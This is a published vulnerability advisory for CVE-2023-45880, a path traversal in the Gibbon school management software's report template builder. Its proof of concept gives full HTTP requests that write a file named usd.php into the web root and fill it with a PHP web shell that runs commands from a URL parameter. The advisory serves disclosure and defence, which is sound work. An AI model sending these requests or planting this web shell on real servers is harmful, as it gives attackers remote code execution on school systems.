usd-2023-0022 | Path-Traversal

Advisory ID: usd-2023-0022
Product: Gibbon (https://gibbonedu.org/)
Affected Version: 25.0.00
Vulnerability Type: CWE 23 - Relative Path Traversal
Security Risk: Critical
Vendor URL: https://gibbonedu.org
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: CVE-2023-45880
CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2023-45880

Desciption

Gibbon Edu is an open-source educational software designed for schools and institutions to manage their administrative and academic processes
It offers a range of features to facilitate communication, collaboration, and organization within the educational community.

The application allows high priviliged users to create report templates.
The report template builder is vulnerable to a Path Traversal vulnerability.

The "uploads" directory is not accessible by default, however it is possible to write files directly in the web root.
Even the file extension can be manipulated which results in an arbitrary file write vulnerability.

Proof of Concept

In the first step, we need to duplicate one of the existing assets. This can be done on the Home > Reports > Template Builder > Manage Assets page.

The original request that is triggered is shown below:

POST /modules/Reports/templates_assets_components_duplicateProcess.php HTTP/1.1
Host: localhost:8080
[...]

------WebKitFormBoundaryGDOtYymhe5cRMATP
Content-Disposition: form-data; name="address"

/modules/Reports/templates_assets_components_duplicate.php
------WebKitFormBoundaryGDOtYymhe5cRMATP
Content-Disposition: form-data; name="gibbonReportPrototypeSectionID"

0000000025
------WebKitFormBoundaryGDOtYymhe5cRMATP
Content-Disposition: form-data; name="templateFileDestination"

footers/pageNumber.twig.html
------WebKitFormBoundaryGDOtYymhe5cRMATP--

The templateFileDestination parameter shows where the component template will be saved to. The file can be moved to the webroot, to make it accessible. An attacker can even change the file extension to php.

POST /modules/Reports/templates_assets_components_duplicateProcess.php HTTP/1.1
Host: localhost:8080
[...]

------WebKitFormBoundaryGDOtYymhe5cRMATP
Content-Disposition: form-data; name="address"

/modules/Reports/templates_assets_components_duplicate.php
------WebKitFormBoundaryGDOtYymhe5cRMATP
Content-Disposition: form-data; name="gibbonReportPrototypeSectionID"

0000000025
------WebKitFormBoundaryGDOtYymhe5cRMATP
Content-Disposition: form-data; name="templateFileDestination"

../../../usd.php
------WebKitFormBoundaryGDOtYymhe5cRMATP--

The file can be created from within the web application. You can insert PHP code and receive remote code execution.

This will result in the following request to be triggered

POST /modules/Reports/templates_assets_components_editProcess.php HTTP/1.1
Host: localhost:8080
[...]

------WebKitFormBoundaryfnqLMucCLAXR1frS
Content-Disposition: form-data; name="address"

/modules/Reports/templates_assets_components_edit.php
------WebKitFormBoundaryfnqLMucCLAXR1frS
Content-Disposition: form-data; name="gibbonReportPrototypeSectionID"

0000000028
------WebKitFormBoundaryfnqLMucCLAXR1frS
Content-Disposition: form-data; name="name"

Page Number
------WebKitFormBoundaryfnqLMucCLAXR1frS
Content-Disposition: form-data; name="templateFile"

../../../usd.php
------WebKitFormBoundaryfnqLMucCLAXR1frS
Content-Disposition: form-data; name="templateContent"

<?php echo system($_GET['cmd']);?>
------WebKitFormBoundaryfnqLMucCLAXR1frS--

It should be noted, that the frontend will return an error that the request "failed due to a database error". However, the file is still created and populated with the payload.
The following screenshot shows, that the file was successfully created and populated with the payload.

 

This vulnerability can be chained with others, resulting in an exploit path that we demonstrated in this video:

 

Fix

It is recommended to prevent passing user-supplied input to filesystem operations.
If this is required, escape user input before processing it. Use a whitelist approach to only allow valid input.

References

Timeline

  • 2023-07-11: Vulnerability identified by Christian Poeschl
  • 2023-09-19: Security Release v25.0.01
  • 2023-11-02: Advisory published

Credits

This security vulnerability was identified by Christian Poeschl of usd AG.